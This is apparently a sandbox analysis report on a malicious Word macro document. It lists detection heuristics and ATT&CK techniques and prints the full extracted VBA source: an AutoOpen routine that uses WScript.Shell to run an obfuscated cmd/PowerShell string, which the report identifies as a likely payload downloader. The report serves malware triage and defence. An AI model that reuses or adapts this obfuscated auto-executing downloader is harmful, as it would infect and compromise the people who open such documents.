MALICIOUS
310
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros with critical heuristics for WScript.Shell usage and Shell() calls, indicating it attempts to execute commands. The macro code appears to be obfuscated but likely constructs and executes a command, possibly involving PowerShell, to download and run a secondary payload. The presence of the ClamAV detection 'Doc.Downloader.Valyria-6664649-0' further supports its role as a downloader.
Heuristics 10
-
ClamAV: Doc.Downloader.Valyria-6664649-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6664649-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Error 15526 / 60673 iqJwHjWwLjk = CreateObject("WScript.Shell") _ . _ -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Error 15526 / 60673 iqJwHjWwLjk = CreateObject("WScript.Shell") _ . _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "JuljlCOB" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10767 bytes |
SHA-256: d28fefc00b26d64fadc749c1e8b0ac78eb43f0c8c420bc45a3eded8495111c4d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
132 of 231 identifiers look randomly generated (e.g. 'NQKzJRAJmqhGjV'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "nJmLzBXWK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NQKzJRAJmqhGjV"
Function AHJjbbdfwMf()
On Error Resume Next
Error 68736 / XuoJu
Error RfRbL / HBnMT * BzwppS / 79956
iCGKVDw = "m" + "d /v^:^" + " " + "^ ^ " + " /r " + Chr(4 + 4 + 2 + 2 + 22)
Error tVkWwj / rhMdJ
Error tEmmKi / 30631 * mTWOH * mBGAT
Error AkYwE / FdpSYv * ImsKR * JWvXaV
Error 35744 * CiASUw * dzarjB / WIvDdX
BadBtBiEwvH = " s^E^t " + " ^ ^ " + "^5" + "^t^" + "2=^=" + "^" + "AA^IA" + "A" + "C^A" + "gA^A^IA" + "^" + "AC"
Error EQQvNl / QuVuDX
Error 71887 / IFhOW
dJNGjLf = "A^gA^" + "A^IA^" + "ACA" + "^g^A^AI" + "AACA" + "^" + "g" + "^AA^I^"
Error 23412 / auEMzd / BHZZB * iQiWwo
Error 65560 * 71605 / KwSPW / cAWEJ
Error 83121 / DwstC
CwiSUuBPwoZ = "AAC^Ag^" + "AA^IA^A" + "C^" + "A^9" + "BQfAs^H"
Error 23165 / iXQjA * EpDps / NfNili
Error 4738 * UvZFSB * dfUHwb * sFjcuS
DKwjJEIK = "^A^oB^w" + "^Y^AQ^" + "H^A^h^" + "B^w^Y^A" + "^0H^A^"
Error 95544 / ipQfPR / VJZKcr * hDHLXU
Error 93311 / rVYECi / iOzaac * ROOilo
MpsJBQvij = "7A" + "wa^" + "A^E^G" + "AlB" + "gc" + "A^I^GA" + "^7^" + "A^" + "Q" + "^bA" + "c^FAVB" + "AJ" + "^A"
Error 29916 / BuqKD / 65311 * MhDZKq
Error rZrwfQ * ESqzI * AHjPFK / InZij
Error aUKEf / bEAMQ
Error sZLGX * ztOLj * zwpYTG / 48417
QkDtsXOs = "ACA^t^" + "BQ^ZA" + "^" + "QH^AJBQ" + "^LAUG^A" + "r" + "B" + "^w^" + "b" + "AYH^" + "A" + "uB" + "Q^S^As^"
Error 21465 * GjZGnG / 86900 * iVMES
Error 9939 / HdBSF
DYOzvrlrw = "DApA^" + "Q^b^Ac^" + "FAVB" + "^AJAA" + "C^A" + "sAgWAs" + "^E" + "AW^B^" + "A^J^A"
Error sXpOwQ * umKRj / SDFjvb * 67393
Error JpvoI / BsaFhh
FJFuXd = "gCAl^B" + "^A^b" + "^A" + "^k^" + "GA^G" + "B^A^Z" + "^A" + "^EGAvB^" + "A^bA^4" + "G^A3B^w" + "^bA^Q" + "^E^Au"
Error 34098 / ZSvSRH / Vqoavl * aTYmO
Error 35428 / 18175 * tsujM * 5108
ImjwFKQn = "A^QW" + "^Ag^GA" + "^h^B^A" + "^" + "J^A^s^" + "HA^5^B" + "^gcAQH" + "A^7"
Error nBWInA / BrawUG
CEokm = "^B" + "^QK^AY^" + "HAk^B" + "^g" + "SA" + "^Q" + "C^A" + "g^Agb^" + "AkG" + "^A^g^A^" + "g"
AHJjbbdfwMf = iCGKVDw + BadBtBiEwvH + dJNGjLf + CwiSUuBPwoZ + DKwjJEIK + MpsJBQvij + QkDtsXOs + DYOzvrlrw + FJFuXd + ImjwFKQn + CEokm
Error 33149 / NIbARM
Error 21368 * 4929
Error 44648 * lSpkm
End Function
Function AnzIvhj()
On Error Resume Next
Error 3725 / TnRoU
Error RjXwNI / KnmmoS
Error scnWoF / kbQdFH / 16990 / TzWiNh
Error 91172 * TvwijC
Error 55241 / JUFXPm / 67701 / EdzHz
crOEtHumiD = "^WA^sEA" + "^W^B^" + "A" + "J^AgC^" + "AoB^" + "w^YA^" + "E^G^A" + "l^B^" + "gc^A" + "^" + "8" + "GAm^B" + "^w"
Error wtmnuD / kDUwz
Error 405 * MUzZVo * 64350 / BiLcU
Error 88628 / HAMBG
Error 50791 / 98625 / rsaVU * wGjwF
Error 32338 / WpGzYb
DNtiFAU = "O^Ac" + "CAl" + "^B" + "^A" + "eAU^G" + "AuA^w" + "JA^sC" + "A" + "M^B^" + "Qa" + "A^8^" + "EA^k^A^"
Error 99045 / zMjtr
Error 31016 / QHVVU
djRUM = "wKAcCAc" + "B" + "^" + "wJA" + "sC" + "^Aj^" + "B^Qa" + "^A^w^G"
Error 2581 * SrloA
Error 25172 / waaYJB
Error 70315 * kwUEi / rdbIoL * BFjLc
HadLthA = "^A^iBQ^" + "d^A^A" + "H^A6A^g" + "dA4" + "GAlBA^J"
Error 66156 / GBURW
wDOJGcEioBX = "A0^" + "D^A" + "tB" + "wVA" + "U^" + "F^"
Error 47137 * uWdrT
Error 20085 * NJmUj * pSpivi / jpwRmC
Error NjzRz * CSjYqV
TkkVbmi = "A" + "^k" + "AwO" + "^AcC^" + "A^5A^QN" + "A" + "ID" + "An" + "^A^AIA" + "0^D" + "^" + "AgA^" + "AT^A"
Error KOPqoY / EcwvQ / GnjkNL * OdnjE
Error 14160 / YNUiSF * 41669 / 52391
Error 98619 / vIOYk
jFssULdvD = "^k^G" + "A^PBA^J" + "^A^s" + "DA^pA" + "wJ^A" + "^" + "AE^" + "AnA^A" + "^K^A" + "QHA^p^B"
Error rISNr * UIPZYh * 52719 * lLZAIU
Error 76419 / qkRQF
Error jlrzi * dtrIji * 84519 * LlNJnF
sTcpP = "Ab" + "^AAHA^" + "T^B" + "gLAcC^" + "AN^" + "B^w" + "^Y" + "^A^" + "s^EAFB"
Error 55524 * UbjWs * afWhQ / woozo
Error 71697 / MWFZsP
Error hfNVAJ * HoEBcL * HXViP / CMamd
wILMrJzfhKM = "ga^" + "A8CAr^B" + "Ad^A" + "^4CAn^" + "B^wZA" + "^UH" + "At" + "^BA" + "N" + "A^E"
AnzIvhj = crOEtHumiD + DNtiFAU + djRUM + HadLthA + wDOJGcEioBX + TkkVbmi + jFssULdvD + sTcpP + wILMrJzfhKM
Error hQZEb * vsGFjN
End Function
Function UfaAkMN()
On Error Resume Next
Error 47725 / zVEbr
Error 73258 * 51874 * 39429 / EzpRT
Error 53188 * ZYfzA * HOQPz / PCazS
puOsQtmWDRk = "GAwA^g" + "^Y^" + "A^QDA^w" + "BQ" + "YAED" + "^A^oBw" + "YA^kHAo" + "^B^QN^" + "A^k^H^"
Error fNBlha / vXEqp * 50872 / DXWDu
Error 69683 / QzDfJA
Error 52223 / BwQhcM / 6990 * UZuzPt
Error ITOrw * bbSqN
fALOwOsOFjM = "Ax^B^" + "gY" + "^AgHA^" + "i^B^Q" + "N^AQ" + "G^" + "A" + "sB^A^ZA" + "^8GA^" + "jB" + "^AN^A^"
Error RmUFNd * zQCaG
Error 12282 / fiXum
Error iBNwp * ztivJk * BsNGK * wKaiq
DQmaV = "E^H^A^i" + "B^wY" + "AIDA^x^" + "AQL" + "A" + "0CA^u" + "^" + "B" + "^Ae^A8C" + "^A" + "vAg" + "^OA^AH"
Error ISXss * wtrpI * 99140 / ELDKN
Error AzqFBl * zhJvzz * XDZvcV / GDvQk
Error 17245 * WJudaj * 88023 * vpQMio
cQjmvoI = "A^0" + "^BA" + "d^A^gG" + "^A^AB" + "^QS" + "A^Q^" + "GA^wAA^"
Error EoriM * ndABvA * DMPUmJ * OScCww
AGEMCOZMCao = "S^A^oFA" + "0B^" + "wL^A^" + "0^G^" + "Av^Bw^"
Error 16945 / ZHAai
Error 75048 / PwQHJj
Error 67896 / udwMck * 39746 * swECm
Error 91663 / lDwJC / KolLo * QjvqKm
RhTmiKQL = "YA4C" + "A0Bg" + "^b" + "^AU^G^A" + "^t^B^" + "QYA^" + "4^G" + "Ay^B^" + "Q" + "d^"
Error 80885 * NqGSXY * 55410 / tpMJQs
Error jrawz / VpatNk * iVHAdY / cLXEV
Error uIEbFG / 80768 * XNrin / 40628
uiMTDFFz = "A^8^" + "G^" + "A0B" + "Ab^Aw" + "^" + "GA^hB^" + "gYAIH" + "^A^l^Bw" + "^ZA^4G"
Error 56379 * swPUE * 18248 / TpjUUV
Error 27523 * ajVRHd / YwuJul / LUttck
Error 51559 * vplQG * CrNUwu / VLDOLq
AqNXAJM = "A^lB" + "^Ab" + "AwG" + "A^hB" + "^A^" + "a^AM^" + "GAvA" + "wLA^oD"
Error riBYA / bBdXzc
Error 54453 / NhnvC * aptbwi / NZcEtu
Error 6366 * ikcQM / YuHvjj * dDaIE
kIUNVVWZcoi = "A^w" + "^BA^d" + "A^" + "Q^HA" + "oBA" + "Q" + "^A" + "^AH^Ay" + "^B^gU" + "AM^" + "HA" + "H^Bw" + "^L^A"
Error 16307 * CslnEu
Error fiTwzC * mjjRw / CzJMw * dlqjK
jNswUj = "I^H^A^o" + "^BgL^A" + "I^GA^l" + "^B" + "^gc^AcG" + "^A^h" + "^B^" + "g^e^A^" + "E^G" + "A" + "^q^" + "Bgb^"
UfaAkMN = puOsQtmWDRk + fALOwOsOFjM + DQmaV + cQjmvoI + AGEMCOZMCao + RhTmiKQL + uiMTDFFz + AqNXAJM + kIUNVVWZcoi + jNswUj
Error jfYmdz * PENDi
End Function
Function LfwjcYGKH()
On Error Resume Next
Error 42399 / hbKcz / bbIVRz * zIrOVj
JarFijja = "A^E^G^" + "A^j^B^g" + "bAU" + "G" + "^" + "AqB^gd^" + "A^" + "8" + "C^AvA"
Error nwwnuw * RYWPW
Error 67650 * IiqEzi
JCFrmQNatS = "gO^A^A^" + "HA0^BAd" + "AgGAAB" + "^Q^W^" + "A4" + "^E" + "A" + "^4B^AN" + "^A^Y" + "G^A" + "R^B^" + "wdA"
Error 49883 / HFLQfY
Error joLjL / fSqzui / zZvFm * COSfPW
htwPOVoG = "^8" + "C^A^t" + "Bwb^A" + "^MGA^" + "u^A" + "gcA^" + "EG" + "An" + "B^QYA^g"
Error RoRwm * SXjkLz / qJAcC / hcjiL
Error VbiGcK * 66336
Error 81867 / BszAMP / kcWsZf / 77476
Error rHJjPK / jMuRIw / 18996 * LoUoEz
Error 11898 / iLdQAd
GVnPkAETbJW = "^GA^0^B" + "^AdA8" + "G^AjBwc" + "A" + "^8CA" + "v^"
Error isiil * Efuojr * 43319 / 20400
Error 37890 / XiPkVF * 1354 / dJYlF
XqmBqGk = "A^gO^AA" + "^H^A^" + "0^BA^" + "d^A^" + "g^GA^AB" + "^QeA" + "M^E^A^h" + "B^gUA^U" + "^H^A^iB"
Error oYQRDa * irPjRP
Error 97446 / nfzGZ / 5484 * LPMtK
Error jMooI * 46585
Error niWHn * uoiXtC / NWnwb / ZGsHz
pnTLWOjD = "^wR^AI^" + "EAv^" + "A^Q^b" + "A^8" + "^G" + "A" + "j^Bg^L^" + "A^U^G" + "^Am^BQ" + "a" + "Aw^G^" + "A^" + "lB^gd"
Error tIfOl / QnTiOc / Qabzo / GOdvD
Error 37719 / RsVHD
Error iVRfzV / BpjKJD * 89753 * YLArVX
RdwptOFAO = "^A^" + "8GAsBQ" + "^YA^" + "k" + "G^Ay^B" + "QYA0^G" + "AhBgbAU" + "HA" + "^s^B^w" + "L^A8C" + "^A6^A"
Error 38805 / 99538 / 31296 * CzZDQ
Error Nbzjh / 4878
Error qRYSr / 50150
Error LBFIv * FwWpaQ / 12961 / XAnwjF
Error 97058 / GziwJ / QAXjo / vNXmIn
AriCFQIO = "^" + "A" + "c" + "^A^Q^HA" + "0^B^Aa^" + "AcCA^"
Error 5790 * LtGaS * hUbqiP / bYNqK
Error GkuISU / 3802
Error DnsUtC * OITZO / KEjZdl / qtjJkf
azjszMd = "9^Ag^dA" + "QG^" + "A^K^BA" + "^J^A^s" + "DA0B^g" + "bAUG^A"
Error 32061 / FhrwQQ
Error bTuYQX / izmmJj / 76159 / jQGVKw
Error 30431 / HDqdT * 68629 * drSUU
Error OEiHYY * wbIjd / 39097 * sZQam
iGNnLw = "^p^B^A" + "bA^M^E" + "Ai^BQ^Z" + "^AcF^A^" + "u" + "AAdAUGA" + "O^" + "B^AIA^Q"
Error 94542 / 61629 * LsEZD * qJDRC
Error 39148 / 6240
EOWJTUrMbnf = "^H^AjB" + "QZ^A^o^" + "G^A" + "i^" + "B^wb^A" + "^0CA^3^" + "BQZA^4" + "^GA9^" + "A" + "^Q^WAgG" + "^Ah^B" + "A"
Error jvbLCH * aDVac
Error 56971 * vIPvA / 63248 / 19777
Error ocpdDC / cGWXME
Error znsAC / SjjBSi
OXrNVH = "^J ^e-" + "^" + " ^l" + "^l" + "e^h^sr^" + "e" + "w^op& " + " " + " " + "^F^" + "or " + " /^l "
Error 98224 * 34595 * 43595 * WdqvXG
jRVkQOtTPj = "%^7 " + "iN ( ^ " + "10^73 " + "-^" + "1^ ^ 0)" + " ^do ^s" + "^et ^iR" + "=!^" + "iR!!" + "^5^t^2" + ":~ %^7,"
LfwjcYGKH = JarFijja + JCFrmQNatS + htwPOVoG + GVnPkAETbJW + XqmBqGk + pnTLWOjD + RdwptOFAO + AriCFQIO + azjszMd + iGNnLw + EOWJTUrMbnf + OXrNVH + jRVkQOtTPj
Error 5748 * kGDEJ / iXdli / 98471
Error 85112 / FdGaEu
Error 39366 / lYVEw / BsRNHk / 83185
Error TimHS * iXGURD * ClAaD * VDQddz
End Function
Function wADoNY()
On Error Resume Next
Error dvHhRv * CFbISA / 32181 / Ohfws
Error 24830 * vJwsW * aLKjHw / kiZkm
Error tAqbSu * rwnIE
Error AsjNv * iVYfY
HTCszPTjW = " " + " 1!&&" + "^I^f %" + "^" + "7 ^e^Q"
Error 52582 / OYGibp * 93480 / KQrFoE
Error 62178 * KwEGTO * 44524 / jjkAC
Xpszjbz = "^u ^0" + " C^" + "a^" + "l^L %^i" + "R:" + "^*^iR" + "^" + "!^=% " + " " + Chr(4 + 4 + 2 + 2 + 22) + " "
Error fJlEb / PaPGR
Error kESTjS * FJwuP * BIoUo / qHUKvq
Error 90269 / jtpPd
Error 7429 / iuizQ / BOvDW / dbYvl
Error 2253 / cYfTn / 25766 / slnYU
Error 28580 / WTrUi / EqmRjZ * 22559
JPPNUDz = ""
wADoNY = HTCszPTjW + Xpszjbz + JPPNUDz
Error XzJkw / jbFhP / 89438 / cJZji
Error 21141 * zRjvWP
Error 74394 / wjGGa
End Function
Attribute VB_Name = "JuljlCOB"
Sub AutoOpen()
On Error Resume Next
Error 15526 / 60673
iqJwHjWwLjk = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(2 + 5 + 8 + 0 + 52) + IqhPjmSRE + fVahpMBaWVU + AHJjbbdfwMf + AnzIvhj + UfaAkMN + LfwjcYGKH + wADoNY + zfbcisqpF + ihHzzPV, 884233353 - 884233353)
Error 17376 * bLkLN * 90561 * cfuoRT
Error 2525 / 20647 * jLUqai * zHFCc
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.